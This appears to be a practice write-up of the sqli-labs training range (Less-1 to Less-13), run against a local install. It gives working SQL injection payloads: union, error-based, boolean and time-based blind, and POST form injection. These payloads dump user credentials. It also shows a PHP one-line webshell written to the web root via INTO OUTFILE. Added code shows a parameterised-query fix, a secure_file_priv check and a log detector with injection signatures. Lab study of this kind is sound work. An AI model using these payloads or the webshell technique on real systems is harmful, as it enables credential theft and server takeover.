[sqli-labs practice notes 1] Basic Injections
Having just organised the basics of SQL injection, I decided to consolidate them by working through the sqli-labs range as a quick review. For reasons of length, this post only covers Page-1 (Basic Injections).
Less-1 GET string-type injection
Walkthrough
Opening the page shows
Welcome Dhakkan
Please input the ID as parameter with numeric value
http://127.0.0.1/bachang/sqli-labs-master/Less-1/?id=1 and 1=2
The page still renders normally, which indicates string-type injection.
Setting id to 1' produces the error You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1
From this we conclude that the parameter is closed with a single quote.
Next, determine the column count with order by:
http://127.0.0.1/bachang/sqli-labs-master/Less-1/?id=-1' order by 4--+
The error only appears once the number reaches 4, so there are 3 columns.
Next, extract the database name:
http://127.0.0.1/bachang/sqli-labs-master/Less-1/?id=-1' union select 1,database(),3--+
The database name is security.
Next, extract the table names in that database:
http://127.0.0.1/bachang/sqli-labs-master/Less-1/?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema="security"--+
The tables are emails, referers, uagents, users.
Obviously we want the data in the users table, so next we extract the column names of users:
http://127.0.0.1/bachang/sqli-labs-master/Less-1/?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name ="users"--+
The columns obtained are user_id,first_name,last_name,user,password,avatar,last_login,failed_login,id,username,password
Next, fetch username and password:
http://127.0.0.1/bachang/sqli-labs-master/Less-1/?id=-1' union select 1,group_concat(username,0x2a,password),3 from security.users--+
Success!
Less-1 summary
- --+ comments out the remainder of the SQL statement
- how to determine the closing style of a string-type injection
- the most basic steps of SQL injection
- the union-query idea, and using order by to determine the column count
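The Less-1 bug comes from pasting the id parameter between single quotes in the query string. As an added example (not the lab's own PHP, and using a constructed SQLite table in place of the lab's MySQL schema), the vulnerable query shape is shown beside its parameterised form, so the closing-quote probe and the union payload from above can be run against both:

```python
import sqlite3

# Constructed stand-in for the lab's users table (sample rows, not the lab's seed data).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'alice', 'pw-alice'), (2, 'bob', 'pw-bob');
    """)
    return conn

def lookup_vulnerable(conn, raw_id):
    # Mirrors the Less-1 query shape: the raw parameter is pasted between single
    # quotes, so a quote in the input ends the literal and the rest becomes SQL.
    sql = "SELECT username, password FROM users WHERE id='" + raw_id + "' LIMIT 0,1"
    return conn.execute(sql).fetchone()

def lookup_safe(conn, raw_id):
    # Hardened form: the value is bound to a placeholder and is never parsed as SQL.
    sql = "SELECT username, password FROM users WHERE id=? LIMIT 0,1"
    return conn.execute(sql, (raw_id,)).fetchone()

def demo():
    conn = make_db()
    probe = "1' and 1=2-- "                                      # closing-style probe
    dump = "-1' union select username, password from users-- "   # union payload shape
    return {
        "legit":      lookup_vulnerable(conn, "1"),
        "probe_vuln": lookup_vulnerable(conn, probe),   # quote closes the literal: no row
        "dump_vuln":  lookup_vulnerable(conn, dump),    # injected union returns table data
        "legit_safe": lookup_safe(conn, "1"),
        "probe_safe": lookup_safe(conn, probe),         # bound as plain text: no row, no SQL change
        "dump_safe":  lookup_safe(conn, dump),
    }
```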
Less-2 GET integer-type injection
Walkthrough
http://127.0.0.1/bachang/sqli-labs-master/Less-2/?id=1 and 1=2
The response is no longer normal, which indicates integer-type injection.
Same as Less-1:
http://127.0.0.1/bachang/sqli-labs-master/Less-2/?id=-1 order by 4--+
The column count is 3.
http://127.0.0.1/bachang/sqli-labs-master/Less-2/?id=-1 union select 1,database(),3--+
Database name: security
http://127.0.0.1/bachang/sqli-labs-master/Less-2/?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+
Table names: emails, referers, uagents, users
http://127.0.0.1/bachang/sqli-labs-master/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+
Column names: user_id,first_name,last_name,user,password,avatar,last_login,failed_login,id,username,password
http://127.0.0.1/bachang/sqli-labs-master/Less-2/?id=-1 union select 1,group_concat(username,0x2a,password),3 from users--+
This returns username and password.
Less-2 summary
1. Learned how to distinguish string-type from integer-type injection (using and 1=2)
2. Consolidated the basic part of SQL injection
Less-3 GET string-type injection
Walkthrough
http://127.0.0.1/bachang/sqli-labs-master/Less-3/?id=1 and 1=2
The page renders normally, so this is string-type injection.
http://127.0.0.1/bachang/sqli-labs-master/Less-3/?id=1'
The error is You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'') LIMIT 0,1' at line 1
So the closing is ')
http://127.0.0.1/bachang/sqli-labs-master/Less-3/?id=-1') order by 4--+
order by shows the column count is 3.
http://127.0.0.1/bachang/sqli-labs-master/Less-3/?id=-1') union select 1,database(),3--+
The database name is security.
http://127.0.0.1/bachang/sqli-labs-master/Less-3/?id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+
The tables are emails, referers, uagents, users.
http://127.0.0.1/bachang/sqli-labs-master/Less-3/?id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+
The columns of users are user_id,first_name,last_name,user,password,avatar,last_login,failed_login,id,username,password
http://127.0.0.1/bachang/sqli-labs-master/Less-3/?id=-1') union select 1,group_concat(username,0x2a,password),3 from users--+
username and password obtained successfully.
Less-3 summary
1. Learned how to determine the closing style of a string-type injection
Less-4 GET string-type injection (double-quote closing)
Walkthrough
http://127.0.0.1/bachang/sqli-labs-master/Less-4/?id=1 and 1=2
The response is fine, so this is string-type injection.
http://127.0.0.1/bachang/sqli-labs-master/Less-4/?id=1'
The response is also fine, so the closing may be a double quote.
http://127.0.0.1/bachang/sqli-labs-master/Less-4/?id=1"
The response is You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1"") LIMIT 0,1' at line 1
So the closing is ")
http://127.0.0.1/bachang/sqli-labs-master/Less-4/?id=-1") order by 4--+
order by shows the column count is 3.
http://127.0.0.1/bachang/sqli-labs-master/Less-4/?id=-1") union select 1,database(),3--+
The database name is security.
http://127.0.0.1/bachang/sqli-labs-master/Less-4/?id=-1") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+
The tables in the security database are emails, referers, uagents, users.
http://127.0.0.1/bachang/sqli-labs-master/Less-4/?id=-1") union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+
The columns of users are user_id,first_name,last_name,user,password,avatar,last_login,failed_login,id,username,password
http://127.0.0.1/bachang/sqli-labs-master/Less-4/?id=-1") union select 1,group_concat(username,0x2a,password),3 from users--+
username and password obtained successfully.
Less-4 summary
1. Learned the SQL injection approach for double-quote closing
Less-5 GET string-type error-based injection
Walkthrough
http://127.0.0.1/bachang/sqli-labs-master/Less-5/?id=1
The response only shows You are in.........., with no echo position, so union injection cannot be used and a blind technique is needed.
http://127.0.0.1/bachang/sqli-labs-master/Less-5/?id=1 and 1=2
The response does not change, so this is string-type injection.
http://127.0.0.1/bachang/sqli-labs-master/Less-5/?id=1'
The response is You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1
So the closing is ', and since the error message is displayed, error-based injection is presumably possible.
http://127.0.0.1/bachang/sqli-labs-master/Less-5/?id=1' union select updatexml(1,concat(0x7e,(select database()),0x7e),1)--+
Note that this uses 1' rather than -1'.
This yields the database name security; note also that the middle argument inside concat() needs its own select.
http://127.0.0.1/bachang/sqli-labs-master/Less-5/?id=1' union select updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)--+
The tables in the security database are emails, referers, uagents, users.
http://127.0.0.1/bachang/sqli-labs-master/Less-5/?id=1' union select updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1)--+
The response is incomplete: XPATH syntax error: '~user_id,first_name,last_name,us'
This is because updatexml() only displays 32 characters, so left(), substr(), right() and similar functions are needed to help.
Here substr() is used:
http://127.0.0.1/bachang/sqli-labs-master/Less-5/?id=1' union select updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_name='users'),1,32),0x7e),1)--+
Note that substr() starts counting at 1! The response is XPATH syntax error: '~user_id,first_name,last_name,us'
http://127.0.0.1/bachang/sqli-labs-master/Less-5/?id=1' union select updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_name='users'),32,32),0x7e),1)--+
The response is XPATH syntax error: '~er,password,avatar,last_login,f'
http://127.0.0.1/bachang/sqli-labs-master/Less-5/
The response is XPATH syntax error: '~ailed_login,id,username,passwor'
http://127.0.0.1/bachang/sqli-labs-master/Less-5/
The response is XPATH syntax error: 'd'
Combining the responses gives the full column list.
http://127.0.0.1/bachang/sqli-labs-master/Less-5/
A similar series of queries retrieves username and password.
Less-5 summary
1. Learned error-based injection and the updatexml() function
2. Remember that substr() starts at 1
3. updatexml() only shows 32 characters of the result
4. Because of the 0x7e added in concat(), the first character of every substr chunk is that 0x7e, so each step adds 31: 1, 32, 63, ...
Less-6 GET string-type error-based injection
http://127.0.0.1/bachang/sqli-labs-master/Less-6/?id=1
As in Less-5 there is no echo position, so union injection is not possible.
http://127.0.0.1/bachang/sqli-labs-master/Less-6/?id=1 and 1=2
The response is normal, so this is string-type injection.
http://127.0.0.1/bachang/sqli-labs-master/Less-6/?id=1'
The response is normal, so the closing is not a single quote.
http://127.0.0.1/bachang/sqli-labs-master/Less-6/?id=1"
The response reports You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1"" LIMIT 0,1' at line 1, so error-based injection may be possible and the closing is a double quote.
http://127.0.0.1/bachang/sqli-labs-master/Less-6/?id=1" union select updatexml(1,concat(0x7e,(select database()),0x7e),1)--+
The database name is security.
http://127.0.0.1/bachang/sqli-labs-master/Less-6/?id=1" union select updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security' ),0x7e),1)--+
The tables are emails, referers, uagents, users.
http://127.0.0.1/bachang/sqli-labs-master/Less-6/?id=1" union select updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_name='users' ),1,32),0x7e),1)--+
A series of queries like this retrieves the column names.
http://127.0.0.1/bachang/sqli-labs-master/Less-6/?id=1" union select updatexml(1,concat(0x7e,substr((select group_concat(username,0x2a,password) from users),1,32),0x7e),1)--+
A series of queries like this retrieves the accounts and passwords.
Less-6 summary
1. The approach is basically the same as Less-5; this consolidated the error-based injection syntax
Less-7 GET outfile injection
Walkthrough
Boolean-based blind injection
http://127.0.0.1/bachang/sqli-labs-master/Less-7/?id=1
No echo position is shown, so union injection does not work.
http://127.0.0.1/bachang/sqli-labs-master/Less-7/?id=1 and 1=2
The response is normal, so this is string-type injection.
http://127.0.0.1/bachang/sqli-labs-master/Less-7/?id=1'
The response reports an error but does not display the error message, so this is not error-based injection; the closing involves a single quote.
http://127.0.0.1/bachang/sqli-labs-master/Less-7/?id=1'))--+
After repeated attempts, the closing turns out to be '))
http://127.0.0.1/bachang/sqli-labs-master/Less-7/?id=1')) and substr((select database()),1,1)='s'--+
The first character of the database name is s.
http://127.0.0.1/bachang/sqli-labs-master/Less-7/?id=1')) and substr((select database()),2,1)='e'--+
The second character of the database name is e.
Repeating this reveals the database name is security (here you can capture the request with Burp, mark the content inside the quotes and the incrementing number, and brute-force them).
http://127.0.0.1/bachang/sqli-labs-master/Less-7/?id=1')) and substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e'--+
Burp can again take over and assist with this work to obtain the table names.
In the same way the column names, and then username and password, can be obtained.
outfile
The challenge hints: use outfile.
1. outfile saves the retrieved data into a file on the server:
Syntax: select * into outfile "<file path>"
Example:
mysql> select * into outfile 'f:/mysql/test/one' from teacher_class;
2. The file is created automatically.
Simply put, this method writes the query results to a file. That is very convenient: although the front end will not display the data we want, we can still obtain the query results this way.
MySQL restricts the import/export path in its configuration file. Since Less-7 does not display any information, we can go back to Less-1 to find out what this path is (in practice, several injection points in the same web application can be used together).
http://127.0.0.1/bachang/sqli-labs-master/Less-1/?id=-1' union select 1,@@basedir,@@datadir --+
@@datadir: database storage path
@@basedir: MySQL installation path
Your Login name:D:/phpStudy/PHPTutorial/MySQL/
Your Password:D:\phpStudy\PHPTutorial\MySQL\data\
First, add the following line to MySQL's my.ini configuration file:
secure_file_priv="/"
Then restart phpstudy; only then can the file export be performed (I had not changed the configuration file and failed to reproduce it, and puzzled over it for a long time QAQ).
http://127.0.0.1/bachang/sqli-labs-master/Less-7/?id=1')) UNION SELECT 1,2,'<?php @eval($_POST["attack"]);?>' into outfile "D:\\phpStudy\\PHPTutorial\\WWW\\bachang\\sqli-labs-master\\Less-7\\text.php"--+
Note the escaping here: every "\" must be doubled.
Then connect with AntSword (蚁剑) to the URL http://127.0.0.1/bachang/sqli-labs-master/Less-7/text.php
and that's it.
In fact, outfile can write the one-line webshell anywhere on the drive that holds the database storage path and the MySQL installation path;
it just has to be under the www folder, because only then can AntSword reach it through the local IP;
it does not have to be inside the Less-7 folder.
Less-7 summary
1. Boolean-based blind injection, combined with Burp Suite for brute-forcing
2. Using outfile to upload a file and get a shell:
select xxx (may contain a one-line webshell; the column count matches the columns before the union) into outfile <file path>--+
3. @@datadir: database storage path
@@basedir: MySQL installation path
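The secure_file_priv line added above is what makes the outfile write possible; it is also the control a defender relies on. As an added example (not part of the original post, with constructed my.ini fragments as input), the following reads that setting out of a my.ini text and classifies it, treating the page's "/" the same as an empty value because a filesystem root confines nothing:

```python
import re

# Constructed my.ini fragments (assumed values, not the author's file): the page's
# weakened setting, a directory-confined one, and the fully disabled one.
WEAK_INI = '[mysqld]\nsecure_file_priv="/"\n'
RESTRICTED_INI = '[mysqld]\nsecure_file_priv="D:/phpStudy/mysql-files"\n'
HARDENED_INI = '[mysqld]\nsecure_file_priv=NULL\n'

def secure_file_priv_value(ini_text):
    # Return the raw secure_file_priv value under [mysqld], or None if it is not set.
    in_mysqld = False
    for line in ini_text.splitlines():
        line = line.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            in_mysqld = line.lower() == "[mysqld]"
            continue
        if in_mysqld and "=" in line:
            key, _, val = line.partition("=")
            if key.strip().lower().replace("-", "_") == "secure_file_priv":
                return val.strip().strip('"').strip("'")
    return None

def assess_secure_file_priv(ini_text):
    # NULL disables INTO OUTFILE / LOAD DATA file access entirely, a directory
    # confines it to that directory, and "" or a filesystem root leaves it unrestricted.
    val = secure_file_priv_value(ini_text)
    if val is None:
        return "unset"
    if val.upper() == "NULL":
        return "disabled"
    if val == "" or val in ("/", "\\") or re.fullmatch(r"[A-Za-z]:[\\/]?", val):
        return "unrestricted"
    return "restricted"
```

The effective value on a running server can be confirmed with SELECT @@secure_file_priv; the variable is read-only, so a change in my.ini only takes effect after a restart.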
Less-8 GET string-type boolean-based blind injection
http://127.0.0.1/bachang/sqli-labs-master/Less-8/?id=1 and 1=2
The response is normal, so this is string-type injection; there is no echo position, so it is not union injection.
http://127.0.0.1/bachang/sqli-labs-master/Less-8/?id=1'
No response, so the closing involves a single quote; after some trying it turns out to be exactly '
http://127.0.0.1/bachang/sqli-labs-master/Less-8/?id=1' order by 3--+
The column count is 3.
http://127.0.0.1/bachang/sqli-labs-master/Less-8/?id=1'--+
http://127.0.0.1/bachang/sqli-labs-master/Less-8/?id=1' and substr((select database()),1,1)='s'--+
Keep enumerating the database name character by character; it turns out to be security.
http://127.0.0.1/bachang/sqli-labs-master/Less-8/?id=1' and substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e'--+
Same as before; the almighty Burp Suite handles the rest.
Less-9 GET string-type time-based blind injection
I was about to reuse the Less-8 approach, but found that no matter what we inject here, the page deceptively says you are in......
Sneaky!
So this is clearly time-based blind injection, which is a bit annoying.
http://127.0.0.1/bachang/sqli-labs-master/Less-9/?id=1 and sleep(5)--+
The response is immediate, so clearly not numeric type.
http://127.0.0.1/bachang/sqli-labs-master/Less-9/?id=1' and sleep(5)--+
The response slows down and only loads after 5 seconds, so this is string type with single-quote closing.
http://127.0.0.1/bachang/sqli-labs-master/Less-9/?id=1' and if(substr(database(),1,1)='s',1,sleep(5))--+
Brute-forcing this with Burp directly reveals the database is security.
Next, enumerate the table names:
http://127.0.0.1/bachang/sqli-labs-master/Less-9/?id=1' and if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='c',1,sleep(5))--+
Brute-forcing yields the table names.
After that, just change what follows select.
Less-10 GET string-type time-based blind injection
http://127.0.0.1/bachang/sqli-labs-master/Less-10/?id=1 and sleep(5)--+
The response is immediate.
http://127.0.0.1/bachang/sqli-labs-master/Less-10/?id=1' and sleep(5)--+
The response is immediate.
http://127.0.0.1/bachang/sqli-labs-master/Less-10/?id=1" and sleep(5)--+
The response slows down, so this is string-type time-based blind injection with double-quote closing.
http://127.0.0.1/bachang/sqli-labs-master/Less-10/?id=1" and if(substr((select database()),1,1)='s',1,sleep(5))--+
Brute-force the database name: once again it is the familiar security.
http://127.0.0.1/bachang/sqli-labs-master/Less-10/?id=1" and if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='s',1,sleep(5))--+
Brute-force the table names; everything after that is as before.
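Every technique from Less-1 through Less-10 (union select, order by probing, updatexml errors, sleep-based timing, information_schema reads, @@datadir/@@basedir, into outfile) leaves a recognisable trace in the web server's access log. As an added example (not part of the original post; the signatures and log lines are constructed, the latter replaying this page's own requests), the following decodes the query string of each line and reports which techniques it matches:

```python
import re
from urllib.parse import unquote_plus

# Signatures for the techniques walked through in Less-1 to Less-10; matched against
# the URL-decoded, lower-cased query string (assumed rules, not a vendor ruleset).
SIGNATURES = {
    "union_select": re.compile(r"\bunion\s+select\b"),
    "column_probe": re.compile(r"\border\s+by\s+\d+"),
    "error_based":  re.compile(r"\bupdatexml\s*\("),
    "time_based":   re.compile(r"\bsleep\s*\("),
    "schema_read":  re.compile(r"\binformation_schema\.(tables|columns)\b"),
    "file_write":   re.compile(r"\binto\s+outfile\b"),
    "server_vars":  re.compile(r"@@(datadir|basedir)\b"),
}

def classify_request(log_line):
    # Pull the request target out of an Apache combined-format line and decode it:
    # unquote_plus turns the '+' that stood in for a space (and %27 etc.) back into text.
    m = re.search(r'"(?:GET|POST) (\S+) HTTP/', log_line)
    if not m:
        return []
    query = m.group(1).partition("?")[2]
    decoded = re.sub(r"\s+", " ", unquote_plus(query).lower())
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]

# Constructed log lines replaying the page's requests (sample data, not a real log).
SAMPLE_LOG = [
    '127.0.0.1 - - [01/Jan/2024:10:00:00 +0800] "GET /Less-1/?id=1 HTTP/1.1" 200 512',
    '127.0.0.1 - - [01/Jan/2024:10:00:01 +0800] "GET /Less-1/?id=-1%27+order+by+4--+ HTTP/1.1" 200 400',
    '127.0.0.1 - - [01/Jan/2024:10:00:02 +0800] "GET /Less-1/?id=-1%27+union+select+1,group_concat(table_name),3+from+information_schema.tables+where+table_schema=%22security%22--+ HTTP/1.1" 200 530',
    '127.0.0.1 - - [01/Jan/2024:10:00:03 +0800] "GET /Less-5/?id=1%27+union+select+updatexml(1,concat(0x7e,(select+database()),0x7e),1)--+ HTTP/1.1" 200 600',
    '127.0.0.1 - - [01/Jan/2024:10:00:04 +0800] "GET /Less-9/?id=1%27+and+if(substr(database(),1,1)=%27s%27,1,sleep(5))--+ HTTP/1.1" 200 500',
    '127.0.0.1 - - [01/Jan/2024:10:00:05 +0800] "GET /Less-1/?id=-1%27+union+select+1,@@basedir,@@datadir+--+ HTTP/1.1" 200 540',
]

def scan(lines):
    # Map line index -> matched techniques, skipping lines that trip nothing.
    hits = {}
    for i, line in enumerate(lines):
        found = classify_request(line)
        if found:
            hits[i] = found
    return hits
```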
Less-11 POST string-type injection
Less-11 is a form. I tried username=1 and password=2 at random and captured the request with Burp.
The captured POST parameters were: uname=1&passwd=2&submit=Submit
uname=1'&passwd=2&submit=Submit
A casual test produced an error straight away.
I tried for a long time here and found that the parameter submit has to be changed to Submit, otherwise neither HackBar nor Burp Suite posts the parameters correctly; I don't know why this is.
uname=1'&passwd=2&Submit=Submit
The error is You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '2' LIMIT 0,1' at line 1
The quote typed into field 1 ended up next to the 2, but that should not matter much, and it shows this should be string-type injection.
Note that in GET injection + can stand in for a space, but in POST injection you have to use -- or # (note the space after --).
uname=1' or 1=1-- &passwd=2&Submit=Submit
uname=1' order by 2-- &passwd=2&Submit=Submit
Determine the column count: this time there are only two columns.
uname=-1' union select 1,database()-- &passwd=2&Submit=Submit
Query the database name.
uname=-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'-- &passwd=2&Submit=Submit
Query the table names.
uname=-1' union select 1,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'-- &passwd=2&Submit=Submit
Query the column names.
uname=-1' union select 1,group_concat(username,0x2a,password) from security.users-- &passwd=2&Submit=Submit
Retrieve the data.
Less-12 POST string-type injection
uname=-1") union select 1,group_concat(username,0x2a,password) from security.users-- &passwd=2&Submit=Submit
Practically no different from the above,
so I'll skip writing out the steps.
Less-13 POST string-type double injection
uname=1'&passwd=2&Submit=Submit
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '2') LIMIT 0,1' at line 1
So the closing is ')
uname=1') order by 2-- &passwd=2&Submit=Submit
Determine the column count.
Since the error message is displayed, error-based injection is possible.
uname=1') union select updatexml(1,concat(0x7e,(select database()),0x7e),1)-- &passwd=2&Submit=Submit